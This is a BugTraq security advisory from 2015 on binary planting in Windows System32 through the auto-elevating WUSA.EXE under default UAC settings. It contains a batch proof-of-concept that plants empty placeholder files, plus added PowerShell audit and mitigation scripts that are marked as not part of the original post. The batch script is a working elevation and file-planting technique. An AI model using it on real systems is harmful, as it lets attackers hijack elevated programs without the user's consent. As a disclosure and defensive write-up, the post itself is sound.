BugTraq
Defense in depth -- the Microsoft way (part 31): UAC is for binary planting
Mar 15 2015 03:48PM
Stefan Kanthak (stefan kanthak nexgo de)
Hi @ll,

the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.

In Microsoft's own terms it doesn't qualify as a security
vulnerability, since UAC is a security feature, not a
security boundary: anything a "protected Administrator" can
do without a prompt is, by definition, not a bypass.

Preconditions:

* a user running as "protected Administrator" (Admin Approval Mode)
on Windows 7 and newer with the default UAC setting, i.e. the
slider at "Notify me only when programs try to make changes to my
computer".

JFTR: this is the default for "out-of-the-box" installations
and typically almost never changed!

* some executables in directory %SystemRoot%\, but not in
directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);

JFTR: REGEDIT.EXE is one of these executables, and it has a
manifest which specifies
<requestedExecutionLevel level="highestAvailable">,
so users running as "protected Administrator" are
accustomed to the UAC prompt when they start REGEDIT.EXE
and will most probably acknowledge the privilege elevation.

Exploit (to be run as a batch script):

REM enumerate every EXE and DLL in %SystemRoot% and plant a same-named
REM file in %SystemRoot%\System32 unless one already exists there
for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
exit /b
:PLANT
if exist "%SystemRoot%\System32\%~1" goto :EOF
REM create an empty placeholder file, wrap it in a .cab and let the
REM auto-elevated WUSA.EXE write it to System32 without a UAC prompt
copy NUL: "%TEMP%\%~1"
"%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
"%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
REM start the EXE by bare name: the planted copy in System32 is found
REM before the genuine one in %SystemRoot%
if /I "%~x1" == ".exe" "%~1" /?

WUSA.EXE is one of the about 70 Microsoft programs which have been
UAC-autoelevated since Windows 7, so the user doesn't need to
answer a UAC prompt when the batch script plants a file in
the directory "%SystemRoot%\System32\".

The planted file matters because CreateProcess() and LoadLibrary()
search the system directory before the Windows directory, and the
default PATH lists them in that order too: a same-named file in
System32 is found before the genuine one in %SystemRoot%, so the next
"regedit" started via Start->Run runs (or, for a DLL, loads) the
planted copy, and the user acknowledges the familiar UAC prompt for
it. The script above only plants empty files, so its final
"regedit /?" fails instead of running anything; that failure is the
proof that the planted copy was found first.

JFTR: Windows 10 later removed the /extract switch from WUSA.EXE, so
the script as written reproduces on Windows 7, 8 and 8.1.
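The following audit script is an added example and not part of the original post; it checks the two facts the post relies on, namely that WUSA.EXE carries an auto-elevate manifest and that a file planted in System32 shadows its namesake in %SystemRoot%. It is meant to be run in an elevated PowerShell on Windows 7 or later; the function and variable names are my own, and the manifest search assumes the RT_MANIFEST resource is stored as plain UTF-8 text inside the PE (which is how Windows binaries embed it).

```powershell
# Added example (not from the post): audit for auto-elevating binaries and
# for System32 files that shadow executables living in %SystemRoot%.
# Written to run on PowerShell 2.0 and later.

$System32 = Join-Path $env:SystemRoot 'System32'

# 1. EXEs under System32 whose embedded manifest says
#    <autoElevate>true</autoElevate>. The manifest is an RT_MANIFEST
#    resource stored as plain text, so a byte-level string search suffices.
function Get-AutoElevateBinary {
    Get-ChildItem -Path (Join-Path $System32 '*.exe') -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer } |
        Where-Object {
            $bytes = [System.IO.File]::ReadAllBytes($_.FullName)
            $text  = [System.Text.Encoding]::ASCII.GetString($bytes)
            $text -match '<autoElevate>\s*true\s*</autoElevate>'
        } |
        ForEach-Object { $_.Name }
}

# 2. EXEs and DLLs in %SystemRoot% itself that now have a same-named file
#    in System32, which is what the batch script plants and what the path
#    search finds first. A few legitimate duplicates exist (notepad.exe,
#    for one), so judge by size and signature: the planted copies are
#    zero bytes long and unsigned. Note that many genuine Windows files are
#    catalog-signed, so "NotSigned" alone is not proof of tampering.
function Get-ShadowedSystemRootBinary {
    Get-ChildItem -Path (Join-Path $env:SystemRoot '*') -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer } |
        ForEach-Object {
            $shadow = Join-Path $System32 $_.Name
            if (Test-Path -LiteralPath $shadow) {
                $item = Get-Item -LiteralPath $shadow
                $sig  = Get-AuthenticodeSignature -FilePath $shadow
                New-Object PSObject -Property @{
                    Name       = $_.Name
                    Bytes      = $item.Length
                    Signature  = $sig.Status
                    Suspicious = ($item.Length -eq 0 -or $sig.Status -ne 'Valid')
                }
            }
        }
}

$auto = @(Get-AutoElevateBinary)
"{0} auto-elevating EXEs in System32; wusa.exe among them: {1}" -f $auto.Count, ($auto -contains 'wusa.exe')

Get-ShadowedSystemRootBinary |
    Sort-Object Suspicious -Descending |
    Format-Table Name, Bytes, Signature, Suspicious -AutoSize
```

Run it once on a clean machine to learn which duplicates are normal on your build, then after the batch script: every name the script planted shows up with Bytes 0 and Suspicious True.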

Mitigations:

* set the UAC slider to "Always notify" (the only behaviour Windows
Vista had): every elevation, including those of auto-elevating programs
like WUSA.EXE, then prompts on the secure desktop. In the registry this
is ConsentPromptBehaviorAdmin = 2 under
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.

* remove the user accounts created during setup from the
"Administrators" group and place them in the "Users" group, i.e.
demote these accounts from "Administrator" to "Standard user".
A standard user gets a credential prompt instead of a consent
prompt, and nothing auto-elevates for it.

Start->Run "control.exe userpasswords2" (alias
"rundll32.exe netplwiz.dll,UsersRunDll") allows this operation!

JFTR: don't forget to enable the builtin "Administrator" account
(and give it a strong password) first, or no administrative logon
will be left.

Cf. <http://windows.microsoft.com/en-us/windows/user-accounts-faq>

| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
| should be used sparingly. You probably created this type of
| account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
| accounts for other people on your PC, it's a good idea to give
| them standard accounts.
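Both mitigations can be applied from an elevated PowerShell; the script below is an added example and not part of the post. It reads and sets the UAC policy values named above, and demotes an account with net.exe (the Microsoft.PowerShell.LocalAccounts cmdlets only exist from PowerShell 5.1 on, whereas net.exe is present on every Windows version the post covers). The account name 'setupuser' is a placeholder to replace, and the function names are my own.

```powershell
# Added example (not from the post): apply the two mitigations.
# Run in an elevated PowerShell; reboot afterwards if EnableLUA changed.

$Policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Auto-elevation is possible unless UAC is on and the admin prompt
# behaviour is 2, i.e. "Always notify" (consent prompt on the secure
# desktop for every elevation, Windows binaries included).
function Test-UacAutoElevationAllowed {
    $p = Get-ItemProperty -Path $Policy
    -not ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -eq 2)
}

# Mitigation 1: the Vista-style "Always notify" slider position.
function Set-UacAlwaysNotify {
    Set-ItemProperty -Path $Policy -Name EnableLUA                  -Value 1 -Type DWord
    Set-ItemProperty -Path $Policy -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
    Set-ItemProperty -Path $Policy -Name PromptOnSecureDesktop      -Value 1 -Type DWord
}

# Mitigation 2: demote a setup-created account to a standard user.
# The builtin Administrator is enabled first so an administrative logon
# remains; set a strong password on it right away (net user Administrator *).
function ConvertTo-StandardUser {
    param([Parameter(Mandatory = $true)][string]$UserName)
    if ($UserName -ieq 'Administrator') {
        throw 'refusing to demote the builtin Administrator account'
    }
    & net.exe user Administrator /active:yes | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'could not enable the builtin Administrator' }
    # already a member -> error 1378, which is harmless here
    & net.exe localgroup Users $UserName /add 2>$null | Out-Null
    & net.exe localgroup Administrators $UserName /delete | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "could not remove $UserName from Administrators" }
}

"Auto-elevation possible before: {0}" -f (Test-UacAutoElevationAllowed)
Set-UacAlwaysNotify
"Auto-elevation possible after:  {0}" -f (Test-UacAutoElevationAllowed)
ConvertTo-StandardUser -UserName 'setupuser'   # placeholder: your setup-created account
```

The demotion takes effect at the account's next logon, since the group membership is baked into the logon token; the currently running session keeps its administrator token until then.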

stay tuned
Stefan Kanthak

Copyright 2010, SecurityFocus